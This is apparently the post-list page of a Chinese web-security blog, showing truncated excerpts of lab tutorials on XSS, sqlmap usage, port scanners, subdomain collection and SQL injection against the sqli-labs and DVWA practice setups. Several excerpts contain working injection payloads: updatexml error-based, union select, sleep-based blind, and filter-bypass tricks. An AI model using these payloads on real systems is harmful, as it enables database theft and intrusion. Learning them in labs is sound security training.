- 博客(39)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 29、xss filter过滤器
一、htmlspecialchars函数htmlspecialchars()函数是使用来把一些预定义的字符转换为HTML实体,返回转换后的新字符串,原字符串不变。<?php $str="<script>alert(123);</script>"; echo $str; $str1=htmlspecialchars($str); echo "\n".$str...
2019-12-31 08:51:02
279
原创 端口扫描 -- scanport和superscan
广场路口,一个醉醺醺的男人打着电话,嘴里一直念叨着“我有钱了,你回来吧。。。”然而,他那免提的通话在凌晨3点的街道上,传来的却是一遍一遍“您拨打的电话是空号”。六月的晚上很潮湿,昏暗的路灯映着空荡荡的人行道,他颓废的样子,烂泥一样掉在路上,好像一部电影。。。今天给大家推荐两款端口扫描工具:scanport和superscan一、环境:win7二、用法:禁止非法,后果自负欢迎关注公众号...
2019-12-31 08:32:27
1728
1
原创 端口扫描 -- WebServiceScanner
不删除,不拉黑,是我对你最后的温柔,不找你,不出现,是我爱你最后的方式。。。今天给大家介绍一款端口扫描工具:WebServiceScanner一、环境:kali2019.4 python2二、安装过程:1、复制WebServiceScanner到本地安装包git clone https://github.com/aedoo/WebServiceScanner.git2、安装依赖包p...
2019-12-30 08:45:01
628
1
原创 注入工具 -- sqlmap(注入参数)
任何关系走到最后,不过相识一场,有心者有所累,无心者无所谓,情出自愿,事过无悔,不负遇见,不谈亏欠。。。一、指定数据库类型 --dbmshttp://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms mysql --dbs二、指定操作系统 --oshttp://192.168.1.121/sqli/Less-1/?id=1&am...
2019-12-27 09:39:14
1149
原创 注入工具 -- sqlmap(指定位置注入和优化性能)
一、指定位置注入1、-p,指定具体探测的参数sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p “id,name” --dbs 对id和name都进行探测2、–skip,忽...
2019-12-26 09:03:52
1253
原创 27、XSS漏洞(恶意链接)
一、环境:DVWA二、修改网页链接1、点击下面的网址,访问的是不同的内容2、通过xss漏洞,修改这些网址都指向百度window.onload:当窗口加载时,执行匿名函数3、在漏洞处输入上面代码,提交4、点击这些网址,都是跳转到百度,查看审查元素三、生成恶意链接(kali攻击,win7被攻击)1、kali启动beff-xss2、启动apache服务:service ap...
2019-12-26 08:52:37
891
2
原创 端口扫描 -- PortScan
现在最遗憾的,大概就是,书没读好,喜欢的人也没在一起,也没活成自己想要的样子。。。今天给大家介绍一款端口扫描工具PortScan一、环境:kali2019.4 python3二、安装过程:1、复制PortScan到本地安装包git clone https://github.com/luckman666/PortScan.git三、命令1、cd PortScan2、python m...
2019-12-25 09:22:57
3207
1
原创 26、XSS漏洞介绍
一、环境:DVWA二、反射型XSS1、随便输入字符qweasd,点击submit2、输入3、弹出对话框,说明存在xss漏洞,一次性的。三、存储型XSS1、正常留言2、在内容里面填写如下代码3、看不到留言内容,但实际已经存储了上面的代码,每次刷新页面都会弹出123存储型xss,攻击脚本存储在目标服务器的数据库中,具有更强的隐蔽性四、DOM型XSS1、我们选择Engli...
2019-12-25 09:14:49
253
原创 注入工具 -- sqlmap(设置请求参数)
我希望我是那种你一见面就觉得心动的人,而不是在权衡利弊后觉得还不错的人。。。一、抓包二、设置提交参数sqlmap -u “http://192.168.1.121/sqli/Less-11/index.php” --data=“uname=111111111111&passwd=222222222&submit=Submit” --baner三、多个参数,指定分隔符...
2019-12-24 08:46:00
2531
原创 注入工具 -- sqlmap(枚举信息)
学生时代最怕的两件事,喜欢的人和别人恋爱了,两节连堂的数学课。。。一、列举数据库名sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --dbs二、列举数据库表qlmap -u “http://192.168.1.121/sqli/Less-1/?id=1”-D security --tables三、列举数据库列名sqlmap -u...
2019-12-23 08:27:31
283
原创 注入工具 -- sqlmap(检索DBMS信息)
自从你删了我以后,我看了一年五个月的资料,时隔一年五个月,你突然出现在我的访客里,我呆坐了一夜,笑着哭,哭着笑,瞒着所有人我还是很喜欢你。。。一、sqlmap检索DBMS Banner–banner或者-bsqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b二、sqlmap检索DBMS当前用户sqlmap -u “http://19...
2019-12-20 08:21:26
1200
原创 注入工具 -- sqlmap(自定义检测参数)
一、设置探测等级,Cookie在level为2的时候就会测试,User-Agent/Referer头在level为3的时候就会测试,默认是1sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --level 5 --dbs二、设置测试风险参数,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试,默认是1...
2019-12-19 09:12:09
789
原创 注入工具 -- sqlmap(获取目标)
成年人的告别仪式很简单,我没有回你最后一条消息,你也很默契没有再发,就这样消失在彼此的生活里,就像从未认识。。。一、-l 从Burpsuite proxy中读取http请求日志文件1、打开Burpsuite,点击Requests,弹出对话框2、生成一个文件13、开始抓包,抓到的包都会自动保存到1中4、命令:sqlmap -l 1根据提示选择。二、-m 从多行文本格式文件读取多...
2019-12-19 08:41:25
250
原创 25、IIS服务器搭建(win server 2003)
一、添加角色到您的服务器二、选择程序服务器(IIS)三、打开Internet 信息服务(IIS)管理器四、右击网站,新建网站五、网站创建向导ip是本地ip,端口随便写,最好别和常用的端口冲突六、在test文件夹随便创建一个html文件,然后访问禁止非法,后果自负欢迎关注公众号:web安全工具库...
2019-12-18 10:03:46
187
原创 端口扫描 -- FastPortScanner
后来想去的地方也去了,后来喜欢的人也不想在一起了,后来我的眼里只有钱了,后来我选择了认真工作和生活了。。。。今天给大家介绍一款端口扫描工具:FastPortScanner一、环境:kali2019.4 python3二、安装过程:1、复制FastPortScanner到本地安装包git clone https://github.com/Dyn4sty/FastPortScanner.gi...
2019-12-18 09:29:09
225
原创 24、显错注入(updatexml和extractvalue)
首先介绍两个函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式,替换查找到的符合条件...
2019-12-17 09:59:26
390
原创 抓包工具 -- Fiddler(拦截包)
多么希望有一天突然惊醒,发现自己是在初三的一节课上睡着了,现在经历的一切都是一场梦,桌上满是你的口水。你告诉同桌,说做了一个好长好长的梦。同桌骂你白痴,叫你好好听课,你看着窗外的球场,一切那么熟悉还充满希望。。。一、输入我们要提交的数据,点击确定二、确认数据后,会到这个界面三、我们打开Fiddler,设置好相关代理。然后在 Rules 菜单中选择“Automatic Breakpoin...
2019-12-17 09:33:46
2421
原创 23、二次注入
环境sqli-labsless 24一、查询数据库第一条数据,账户密码都是Dumb二、注册新的账号账户:Dumb’ --空格 密码:1重新查询数据,新注册的数据在最后一行三、登陆刚注册的账号,修改密码四、查询数据库,原来的密码被修改了禁止非法,后果自负欢迎关注公众号:web安全工具库...
2019-12-16 08:40:23
124
原创 端口扫描 -- CThun
最美好的大概还是那些初识的日子,是对彼此不全然地了解,又极度渴望了解的那段时光。。。今天给大家介绍一款端口扫描工具CThun一、环境:win7二、用法:cthun.exe -ips 192.168.1.121 -p 1-65535结果会保存到一个result的txt文件禁止非法,后果自负欢迎关注公众号:web安全工具库...
2019-12-16 08:33:05
595
原创 22、宽字节注入
环境sqli-labsless 32一、输入特殊字符,都被转义了http://192.168.1.121/sqli/Less-32/?id=1\http://192.168.1.121/sqli/Less-32/?id=1’http://192.168.1.121/sqli/Less-32/?id=1’’二、构造宽字节闭合http://192.168.1.121/sqli/Le...
2019-12-13 08:22:42
112
原创 子域名收集 -- theHarvester
你信不信会有个人,认认真真的看完你每条状态,包括底下的每条回复,但是一句话都不会说。。。今天给大家介绍一款子域名收集软件theHarvester一、环境 kali2019.4 python3二、安装过程:1、复制到本地安装包git clone https://github.com/laramies/theHarvester.git2、安装依赖pip3 install -r ./ex...
2019-12-13 08:12:12
823
原创 子域名收集 -- domained
父亲打来电话特别愧疚的语气对我说,我明年,干不动了,不干了,像是在征求我的意见,我当时眼泪一下就出来了,真的,愧疚的不是你而是我。。。今天给大家介绍一款子域名收集软件domained一、环境 kali2019.4 python3二、安装过程:1、复制到本地安装包git clone https://github.com/TypeError/domained.git2、安装依赖pip3 ...
2019-12-12 10:58:00
307
原创 21、sqlmap参数详解
sqlmap参数详解:Usage: python sqlmap.py [options]Options(选项):-h, --help Show basic help message and exit 展示帮助文档 参数-hh Show advanced help message and exit 展示详细帮助文档 参数–version Show program’s version num...
2019-12-12 10:55:26
545
原创 端口扫描 -- portscan
一个男人最难熬的状态就是:眼里操心着父母,脑子里想着事业,心里装着个姑娘,胸膛中盛着远方,可是最后失望于父母,辜负了姑娘,看不见远方。。。今天给大家推荐一款端口扫描工具:portscan一、环境:kali2019.4 python2二、命令python PortScan.py 192.168.1.121 21 60000禁止非法,后果自负欢迎关注公众号:web安全工具库...
2019-12-11 08:35:45
1112
原创 20、绕过去除and、or、union select、空格的sql注入
环境sqli-labsless 251、输入特殊字符,报错http://192.168.1.121/sqli/Less-25/?id=12、单引号闭合3、输入and、or都会被过滤,报错,输入||正常,所以可以判断是大小写过滤http://192.168.1.121/sqli/Less-25/?id=1’ and 1=1 --+http://192.168.1.121/sqli/...
2019-12-10 15:05:28
1456
原创 子域名收集 -- Sublist3r
这个世界除了朝九晚五,还有很多人要加班到深夜,没有双休,没有热好的粥和灯火通明的家,用尽全力去生活,不过勉强温饱,生活不会总是一片黑暗,你想要的终会到来!!!今天给大家介绍一款子域名收集软件Sublist3r下载地址:https://github.com/aboul3la/Sublist3r一、环境 Kali2019.4 python3二、安装过程:1、下载到本地git clone h...
2019-12-10 15:04:15
253
原创 19、绕过去除注释符(Get)
环境sqli-labsless 231、输入?id=1,正常运行2、输入特殊字符报错3、单引号闭合,但是发现# --+等都被过滤了4、使用下面代码闭合192.168.1.121/sqli/less-23?id=1’ or ‘1’=‘15、用union select判断字段数192.168.1.121/sqli/less-23?id=1’ union select 1,2,...
2019-12-10 09:05:35
460
原创 端口扫描 -- Rapid Scanner
相片和音乐,是有记忆功能的,前两天和好朋友去小卖铺买了一根棒冰,走过操场和篮球架,走过画室,也去食堂打了一次饭,就和一年前平淡无奇的每一天一样,所有细碎的过往和经历就这么纷至沓来,学生时代,大概是最好的时代了吧。。。今天给大家推荐一款端口扫描工具:Rapid Scanner一、环境:win7二、用法禁止非法,后果自负欢迎关注公众号:web安全工具库...
2019-12-10 08:53:14
943
1
原创 端口扫描 -- Masscan-Gui
老爸第一次支支吾吾问我还有没有钱的时候,却忘了,我以前是理直气壮的去向他们要钱。。。今天给大家介绍一款端口扫描软件Masscan-Gui一、环境 win10二、用法1、直接运行exe2、打开软件,多个ip扫描用导入,单个ip直接输入,然后点击探测主机或者端口扫描禁止非法,后果自负欢迎关注公众号:web安全工具库...
2019-12-09 11:30:40
1896
1
原创 18、cookie注入(base64加密)
环境sqli-labsless 211、通过抓包,我们发现cookie是base64编码的,解密后是admin2、我们输入特殊符号,看报错信息,特殊符号也需要base64编码3、我们通过’)进行闭合,返回正常4、后面带入相关的查询语句并用Base64编码。查询语句参照less 20less 22用的是双引号闭合,注入语句同上。禁止非法,后果自负欢迎关注公众号:web安...
2019-12-09 11:26:39
3267
原创 17、cookie注入
环境sqli-labsless 201、在cookie里输入特殊字符报错发现是单引号闭合2、判断字段长度order by 3正常,order by 4返回错误3、union联合查询a’ union select 1,2,3 #4、获取数据库名称a’ union select 1,2,database()#5、获取表名a’ union select 1,2,group...
2019-12-06 17:34:51
245
原创 端口扫描 -- masnmapscan
你知道么,最难过的是,有一天你突然发现,不知道什么时候起,爸妈开始看你的脸色了。。。今天给打家介绍一款端口扫描工具masnmapscan下载地址:https://github.com/hellogoldsnakeman/masnmapscan-V1.0一、环境 kali2019.4 python2二、安装过程:1、复制masnmapscan到本地安装包2、安装依赖3、复制mas...
2019-12-06 17:22:26
1968
2
原创 16、HTTP头注入(User-Agent、Referer)
环境sqli-labsless 181、在UA处输入特殊字符,报错2、构造输入语句,获取数据库名称or updatexml(1,concat(’##’,(database())),0))#3、获取表名or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.table...
2019-12-05 12:00:39
2101
原创 端口扫描 -- K8PortScan
我们总是在错误的时间,错误的地点,懵懵然就爱上那个人,然后,不得不用尽一生遗忘。。。今天给大家介绍一款子域名收集软件K8PortScan一、环境 win7二、命令默认43个端口python K8PortScan.py -ip 192.168.1.119指定端口范围python K8PortScan.py -ip 192.168.1.119 -p 80-8080C段指定端口列表扫描...
2019-12-05 11:13:48
565
原创 15、延时布尔盲注(Post)
环境sqli-labsless 151、首先我们抓包2、测试注入在 username 输入 1’ or 1=1#在 password 输入 任意所以用单引号闭合3、我们构造语句uname=admin’ and (select (if(length(database())>=8,sleep(5),null)))-- &passwd=2&submit=Sub...
2019-12-04 12:42:17
512
原创 子域名收集 -- subcollect
骗了父母,买了去你所在城市的车票,只身一人去见你,在那个城市,我被骗了7500块钱。找到你,一起吃了饭,看了电影,你说你要回寝室,我送你回去,之后自己找了个20块钱的小旅馆,发现自己没烟了,就去楼下买烟,当我到楼下后,看见你上了一辆车,车没开,你和他热吻了5-6分钟,我不难过,因为是编的。。。今天给大家介绍一款子域名收集软件subcollect一、环境 kali2019.3 python3二...
2019-12-03 22:21:47
146
原创 14、sql注入绕过技术
一、大小写绕过把关键字修改为And,OrdEr,UniOn。。。二、双写绕过把关键字修改为AandND,OOrderrder。。。三、编码绕过http://192.168.1.120/sqli/Less-5/?id=1转换后:http%3A%2F%2F192.168.1.120%2Fsqli%2FLess-5%2F%3Fid%3D1四、内联注释/! select/ * form ...
2019-12-03 22:18:55
130
原创 13、报错注入(Get)
环境sqli-labsless 51、我们随便输入’,看到报错信息可以判断,需要单引号闭合2、构造查询获取数据库名称语句http://192.168.1.120/sqli/Less-5/?id=1’ union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),...
2019-12-02 15:48:50
189
原创 子域名收集 -- DiscoverSubdomain
2019年她结婚了,结婚的前一天,她让我一定要来参加婚礼,我目送她挽着新郎的手臂从红地毯的这头走到那头,我能看见她脸上洋溢出来的幸福,我被一群人簇拥着抢她的手捧花,她一个转身,递到我的手里,司仪问我有什么想说的话,我对着她的父母说,叔叔阿姨,对不起,这辈子没能做成您二老的女婿,我下辈子一定努力。。。 ...
2019-12-02 15:29:39
373
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人